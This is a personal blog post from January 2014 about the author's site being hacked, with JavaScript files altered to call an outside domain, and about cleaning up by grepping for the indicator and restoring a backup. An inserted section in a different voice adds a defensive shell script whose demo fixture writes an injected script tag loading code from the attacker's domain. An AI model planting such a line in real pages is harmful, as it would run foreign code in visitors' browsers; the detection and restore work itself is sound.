Site Hacked!

The site was hacked yesterday (Jan 15, 2014). Somebody (or bodies) somehow got the main site password and had full access. They were downloading and uploading files like they owned the thing. Like they were up in their own house .. sittin' on their own couch. "Somebody's been sleeping in *my* bed," said papa bear.

This has never happened before (.. as far as I know, anyway).

I had to restore a back-up from the 14th .. which was taken before any nasties occurred ..

.. but you probably need to close all radified web pages and clear your browser cache.

I posted more info in the forums .. see here.

If you made any posts between the 14th and today, they are gone (2 days worth).

From what I can see .. they modified some of my JavaScript files in order to WRITE to a file on a server located down near the border of San Diego with Mexico (Chula Vista).

My trace-route program is not exact, so I can't tell if the server is physically located in Mexico .. but it looks like it's located in the US.

Hacking is a Full-Time Job (apparently)

Somebody near NYC spent most of the day yesterday playing with/on my server .. from ~6AM East coast time, to 3PM East coast time. (Dude, you spent all freaking day on my server? WTF? Certainly you have better shit to do, no?)

So .. the script hack seems more snoopy than malicious. The techs at Wiredtree helped me. They are wizards. Stuff I never woulda thought of.

Yes, I noticed the site acting strangely yesterday, but I did not have time to troubleshoot.

Then this morning, the server down in Chula Vista (probably hacked itself) became overloaded and that raised the red flag ..

.. very high. (Browser status: waiting for vacance-petit-prix.com.)

I played around and noticed that the problem did not occur when I disabled JavaScript or went through a proxy server (which had JavaScript disabled by default).

Dude, if you want site stats, why don't you just ask? All the data contained on this site is open and free for all to access.

Where should I send the file? Then I won't be overloading your server. What kind of stats would you like?

I don't want to put you out of a job .. but your code is fucking up my site.


I don't sell anything here. There are no credit card numbers coming in. So it seems your time would be better spent elsewhere.

Regarding the snooping hacker .. I pretend that there is a set of eyes looking over my shoulder, watching me type. (Because there is.) And when I pass gas, I say, "That's for you, bitch. You're welcome."

Step-by-Step Troubleshooting = An Algorithm

To be honest, it really does feel like an "attack". Kinda slimy. Like somebody's been sleepin in *my* bed. Ick. Now there are bugs crawling in my bed. Maybe I am not as tired as I thought I was.

Yes, getting hacked feels surprisingly icky .. but Geeks love that kind of shit. I had a woody the whole time. Let me share with you the process we (I) went thru .. cuz this is the kind of shit geeks love most.

The worst part was that I saw the problem while I was still half asleep. And I was whacked when I woke cuz I had run the hill the day that I heard about the Kelly-verdict. (See below.) Probably ran harder than I should've.

Anyway, I knew there was a problem with either my browser (local) or the server (Chicago).

Local browser was easiest, so I uninstalled and re-installed Chrome. "Oh, that's not good," I said, when the problem persisted after re-install.

So I called my server techs. (Who are there 24x7.) They are true wizards. Really. The girl started by virus-scanning the whole site server, which found nothing suspicious.

So I shoot them an email saying "How do I search every file on the site for the string vacance-petit-prix?" I would rather do it myself .. if I can. (Cuz that's how we learn.) And the dude gives me the code. Here it is. Take a deep breath:

find /home/radified/public_html/ -type f -exec 'grep' '-Hin' 'vacance-petit-prix.com' '{}' ';' 2>/dev/null

But, in order to use this, you must go into the shell. Which uses the command line. An unforgiving place. But you can feel the power there.

And the program I use to access the shell (PuTTY) does NOT support copy-n-paste .. not in Windows.

Because it is a fundamentally different operating system .. seeing that the server runs on Linux (Unix-y) .. and there is a fundamental mistrust at the very core of each for the other: "I don't know you, jack. Where you from?" ..

Whereas in Linux you CAN copy-n-paste into the shell command line. Which is why anybody who has anything to do with servers that run Linux wants to be USING (and proficient with) Linux.

Proficiency with Linux & Server Administration

I have heard that this is a good book on the subject .. of proficiency with and in a Linux/Server environment.

Look at the title of this one: Linux System Programming: Talking Directly to the Kernel and C Library. This is well beyond me .. but my sense is that the person who knows (understands) how to wield the mojo contained in that title .. would be a bad dude.

[Image: Linux book by Mark Sobell (2012), 3rd edition]

I am suddenly feeling a jones for learning the Linux operating system .. along with server admin (.. two things which actually line up nicely together .. one after the other).

There is a nice clean feeling in Linux that is hard to describe .. because it actually feels like part of your imagination.

For the geek, you kinda wanna learn stuff that is going to provide the most access to power. And servers are very powerful. Because they transmit information (ideas, skills, tools, techniques, jokes, laughs, sorrows, outrage, etc.). From one like-minded soul to another.

It feels like I am talking myself into becoming more proficient with server administration (via the command line). Dude, there are so many books at Amazon with Linux-oriented titles dated 2012. Very recent.

Wish I could download the skill sets contained in those books .. like they do in the Matrix. "Standby for data upload. Hey, now I know how to fly a helicopter. Cool."

Anyway, in Windows, where I am right now, you must type each c.h.a.r.a.c.t.er individually. Did you see the size of that freaking string? Wrap city. Here, let me show you again:

find /home/radified/public_html/ -type f -exec 'grep' '-Hin' 'vacance-petit-prix.com' '{}' ';' 2>/dev/null

Let me just note here .. that wizardly programmers have told me that, in order to become a studly programmer, I need to learn (how to use) regular expressions.

No I have not learned them. But yes, I can see how powerful they are. Easily see. Amazingly powerful.

The SKILL required to assemble and operate those commands is kinda what I was talking about back when I discussed the different mindsets involved in using Windows vs Unix (Linux).

Monolithic vs Granularity. Too much to delve into right now, but maybe this will remind me to re-explore later.

WinSCP (whose installer can bundle PuTTY) supports secure file transfers. And no, I was not using the latest greatest version. But I *did* upgrade today.

Anyway, we got lots of "hits" from that query .. fucking gold mine .. all of them located in JavaScript files.

I knew that, the day before, I had only modified the files in Movable Type, which runs off a database (MySQL).

So, I say, "Dude, let's back-up the MySQL database, and then restore a site back-up from before the time when the hack occurred ..

.. and then restore the database .. because that is really the only thing that I changed between then and now."
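As an added example (not the site's own code, and not what the Wiredtree techs ran), here is a small POSIX shell script that does both of the things described above: it hunts for an indicator string across every file under a web root, the way the find/grep one-liner does, and it lists the files that differ from a known-good backup, which is how you find out exactly what changed between the clean snapshot and now, including tampered files that carry no known indicator at all. The web root, the backup tree and the injected JavaScript are all constructed inside a temp directory for the demo; the paths and the function names (make_demo_tree, scan_for_ioc, infected_files, changed_since_backup) are assumptions, not anything from the original page.

```shell
#!/bin/sh
# Added example, not the site's own code. Builds a constructed web root plus a
# constructed clean backup of it, then (1) searches every file for an indicator
# string and (2) lists files that differ from the backup. Everything under the
# temp directory is made up for the demo.

# Indicator string to hunt for (the domain the injected script talked to).
IOC='vacance-petit-prix.com'

# make_demo_tree: create $base/backup (clean) and $base/live (tampered).
# Prints the base directory so callers can inspect and later remove it.
make_demo_tree() {
    base=$(mktemp -d)
    mkdir -p "$base/backup/js"
    # constructed clean site files
    printf '<html><body>Radified</body></html>\n' > "$base/backup/index.html"
    printf 'function init() {\n  console.log("hello");\n}\n' > "$base/backup/js/app.js"
    printf 'var x = 1;\n' > "$base/backup/js/util.js"
    # the live tree starts as an exact copy of the backup ...
    mkdir -p "$base/live"
    cp -r "$base/backup/." "$base/live/"
    # ... then gets tampered: a script tag appended to app.js (mixed case on
    # purpose: a case-sensitive grep would miss it) and a brand-new file that
    # contains no indicator at all, so only the backup comparison reveals it.
    printf '%s\n' "document.write('<script src=\"http://VACANCE-petit-prix.com/x.js\"></script>');" >> "$base/live/js/app.js"
    printf '%s\n' '// constructed new file with no indicator string in it' > "$base/live/js/extra.js"
    echo "$base"
}

# scan_for_ioc ROOT STRING: every regular file under ROOT, case-insensitive,
# output as file:line:text. Errors (unreadable files) are dropped, like the
# one-liner above. '--' keeps a pattern starting with '-' from being an option.
scan_for_ioc() {
    find "$1" -type f -exec grep -Hin -- "$2" {} \; 2>/dev/null
}

# infected_files ROOT STRING: only the distinct matching paths, sorted.
infected_files() {
    find "$1" -type f -exec grep -lis -- "$2" {} \; 2>/dev/null | sort
}

# changed_since_backup LIVE BACKUP: relative paths of files under LIVE that are
# absent from BACKUP or differ from it byte for byte (cmp). This catches new
# files and edits that carry no known indicator string.
changed_since_backup() {
    live=$1
    backup=$2
    ( cd "$live" && find . -type f ) | sort | while IFS= read -r rel; do
        if [ ! -f "$backup/$rel" ] || ! cmp -s "$live/$rel" "$backup/$rel"; then
            printf '%s\n' "$rel"
        fi
    done
}

# demo: run both checks against the constructed trees, then clean up.
demo() {
    base=$(make_demo_tree)
    echo "== matches for $IOC under live =="
    scan_for_ioc "$base/live" "$IOC"
    echo "== files differing from the backup =="
    changed_since_backup "$base/live" "$base/backup"
    rm -rf "$base"
}

demo
```

Point it at a real tree by calling scan_for_ioc and changed_since_backup with the live web root and the restored backup; the string search alone would have missed the constructed extra.js, which is why the comparison against a clean copy is the check to run before trusting a restore.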

This guy who I was talking to .. I could tell that he was a few lightyears ahead of me. It's so satisfying when you work with people who know what the fuck they are doing. (Competence.)

He sent me a note that said something like "Dude, I'm handling it. I'll let you know when it's done."

Less than an hour later he said "It's done. Lemme know how things look."

I nearly shit myself when the problem was STILL THERE .. but then I remembered to clear my browser cache. (Like I once told somebody's lawyer who was threatening me with untold nastiness.) Anyway .. after I cleared the browser cache: success! Voila! Freaking magic.

Update. This new WinSCP is sweet. Very smoooth. Nice feel. Very professional feel. Like very smart people assembled it. I would certainly be proud. I mean, it is like get-your-attention nice.

Hopefully it has no NSA backdoors .. like other technology has.


About this Entry

This page contains a single entry by Rad published on January 16, 2014 1:16 AM.

The Kelly Thomas Verdict Reflects the Importance of Appearances in Polite Society was the previous entry in this blog.

Thanks for the Memories, George (Ode to 43) is the next entry in this blog.
